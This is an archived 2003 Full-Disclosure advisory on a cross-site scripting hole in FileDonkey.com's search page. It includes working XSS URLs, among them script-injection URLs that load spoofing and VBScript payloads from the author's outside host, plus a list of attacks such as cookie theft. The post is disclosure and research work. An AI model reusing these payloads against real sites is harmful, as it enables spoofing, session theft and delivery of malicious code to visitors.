lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 12 Oct 2003 18:49:59 +0200 From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com> To: "Full-Disclosure" <full-disclosure@...ts.netsys.com> Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com> Subject: FileDonkey.com Cross Site Scripting FileDonkey.com Cross Site Scripting ------ WEBSITE: File Donkey DOMAIN: www.filedonkey.com RISK: 7 OWNERS STATUS: webmaster@...edonkey.com [ warned same time as security lists ] --------------------- --- DESCRIPTION --- FileDonkey.com is the only one web search supported engine by P2P clients like eMule , xMule , etc. FileDonkey is a world wide used website for found the files that you want in the eDonkey networks (P2P). --------------------------------------------- |SECURITY HOLES FOUND and PROOFS OF CONCEPT:| --------------------------------------------- I was making some tests in the FileDonkey website but i didn't remember the search engine, search engines are the first systems affected by Cross Site Scripting holes because , normally , they have an insufficient input validation control and they make outputs ( search results ) without checking for dangerous codes , this can be exploited easily with some lines of PHP Code and a little knowledge of PHP and Java Script. --------------------------------------------- | CROSS SITE SCRIPTING HOLES FOUND | --------------------------------------------- Located in the Search engine , currently using a script with HTML extension , search.html . This script basically uses 5 variables: pattern=[KEYWORDS] min_size=[FILE MIN SIZE] max_size=[FILE MAX SIZE] scope=[FILE TYPE] submit=[YOUR SUBMIT BUTTON CODE] But only one is needed : pattern= You must include the keywords for the anted file , and , walla ! f the file is available , it provides you a nice list of results ( ed2k links ). The keywords sent will be sown in ( if there are no available files ) : No files found for pattern 'NoSecureRootGroupSecurityResearch'. Ok , it seems not vulnerable but , wait a moment , the keywords are in the form field , and , we know that a form field always ends with a "> , let's try! .....We send the request in POST Mode...Or use this url: http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields Down ! -. xD');</script> And we get... -----JavaScript Application----- | | | xD .- Shields Down ! -. xD | | | |------------------------------| The script was successfully executed in the client side . Fantastic for attackers ( not me ;-). We can try more things , and , of course , my loved PHP perfomance: .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. | CODE FOR THE COMMON XSS TESTING TASKS | .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. /\ cut from here /\ <?php // ---------------------------------- // XSS TESTING SCRIPT // NO SECURE ROOT GROUP SECURITY RESEARCH // BY LORENZO HERNANDEZ GARCIA-HIERRO // * NOT FULL VERSION * // ---------------------------------- $domain = "FileDonkey.com/Other"; $member = "Lorenzo Hernandez Garcia-Hierro"; $referer = getenv("HTTP_REFERER"); $data = getenv("QUERY_STRING"); $xss = strip_tags($data); echo "$xss"; ?> /\ xss-testing.php END ! /\ Please note that i removed lots of lines of the code for prevent bad uses of this. A full version is running under http://test-zone.nsrg-security.com/xss/?XSS_TEST it has -- THE REAL EXPLOITATION -- Now we start to exploit the xss hole : *-.Possible attacks: 1.- Including malicious scripts for execute them in the Client side. 2.- Try to stole cookies data ( no cookies are given in FileDonkey ) 3.- Try to connect to malicious sites trough the Microsoft.XMLHTTP . 4.- Try to use known vulnerabilities for stole other domains data. SOME PROOFS OF CONCEPTS: ________________________ A script that i developed for change some web page stuff ( spoofing ) : http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script> A Georgi Guninski Script ( shows a blue screen that spoofs all the screen: http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script> Replace Windows Media Player executable with a non dangerous file that sows a dialog with some nice stuff of the NSRGroup: http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script> The XSS standard testing script ( NSRGroup XSS-TST-STANDARD ) http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD *//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ * REFERENCES -> ONLINE /*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ http://advisories.nsrg-security.com/FileDonkey.com-XSS ----------- | CONTACT | ----------- ------------------------------- 0x00->Lorenzo Hernandez Garcia-Hierro 0x01->Security Consultant __________________________________ PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** No Secure Root Group Security Research Team http://www.nsrg-security.com ______________________ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists